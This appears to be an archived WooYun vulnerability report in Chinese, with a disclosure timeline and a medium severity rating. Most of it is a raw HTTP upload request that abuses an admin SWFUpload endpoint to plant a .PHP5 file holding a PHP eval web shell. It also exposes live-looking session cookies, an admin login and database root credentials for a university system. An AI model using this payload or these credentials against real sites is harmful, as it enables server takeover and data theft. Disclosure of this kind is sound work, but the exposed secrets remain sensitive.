乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-05: 细节已通知厂商并且等待厂商处理中 2016-01-06: 厂商已经确认,细节仅向厂商公开 2016-01-16: 细节向核心白帽子及相关领域专家公开 2016-01-26: 细节向普通白帽子公开 2016-02-05: 细节向实习白帽子公开 2016-02-12: 细节向公众公开
哎 隔壁的老王偷了我的iPhone
POST /admin.php?c=attachments&a=swfupload&dosubmit=1 HTTP/1.1Accept: text/*Content-Type: multipart/form-data; boundary=----------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1User-Agent: Shockwave FlashHost: **.**.**.**Content-Length: 1899Proxy-Connection: Keep-AlivePragma: no-cacheCookie: SpLangCookies=cn; _gscu_742156466=51819580yd5f5234; _gscs_742156466=51819580co97jm34|pv:1; PHPSESSID=540bb846e41d5c77a474d6c573169d44; zjuoluserid=Qg%3D%3D; zjuoladmin_email=HgscFxQ6EAAMD1QPERpCGQQ%3D; zjuoladmin_username=HgscFxQ%3D; zjuolatt_json=AUgUBghYUEdcWkhcRVxAWBkHDE5ASB0bGApQKUAwVR0CGEIAHxYMQh8OAEEPFDZaGhwWBRQLChMGEDNDSFpEWTBVWkRfWCZFR19dTFpEX1hKWERZWE1fQVZCEBoSTUBYDBwDCRQLGApOQEgBCgECRAUwBhdEFBwcX1k3QQYKDVcSEAYRVw4FHkhPWlVJXU1aWVZIBh0PWFBXBxgOGk8zQyZFAhgbVBAADA9UDxEaQhkEKUAZCgYaDggcAxkKMFVYRV5aJkVFXlxONlpdXEtcRV5cTlpHXVtIW0dbWFQABQhOVkgTBgAfBBQCCVhQVxdCEBoSTRE%3D------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1Content-Disposition: form-data; name="Filename"a.cer------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1Content-Disposition: form-data; name="filetype_post"aspx|aspx|asp|php5|docx|xls|xlsx|ppt|pptx|pdf|txt|rar|zip|swf------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1Content-Disposition: form-data; name="swf_auth_key"429a371c17329d0af5c61ae3abead687------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1Content-Disposition: form-data; name="thumb_width"0------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1Content-Disposition: form-data; name="dosubmit"1------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1Content-Disposition: form-data; name="thumb_height"0------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1Content-Disposition: form-data; name="isadmin"1------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1Content-Disposition: form-data; name="watermark_enable"1------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1Content-Disposition: form-data; name="userid"1------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1Content-Disposition: form-data; name="groupid"8------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1Content-Disposition: form-data; name="SWFUPLOADSESSID"1451845655------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1Content-Disposition: form-data; name="catid"10------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1Content-Disposition: form-data; name="siteid"1------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1Content-Disposition: form-data; name="module"content------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1Content-Disposition: form-data; name="Filedata"; filename="a.PHP5"Content-Type: application/octet-stream<?php @eval($_POST['tom']);?>GIF89a<?php @eval($_POST['tom']);?><?php @eval($_POST[tom])?>------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1Content-Disposition: form-data; name="Upload"a------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1--
后台帐号:daixx pass:amanda3020397--------------------------------------host => localhostlogin => rootpass => zucc@xcb#2012 root数据库密码database=> zuccprefix => ---------------------------------------哎 隔壁的老王偷了我的iPhone
哎 隔壁的老王偷了我的iPhone 何时我的Rank能够换回来
危害等级:中
漏洞Rank:6
确认时间:2016-01-06 07:59
通知处理中
暂无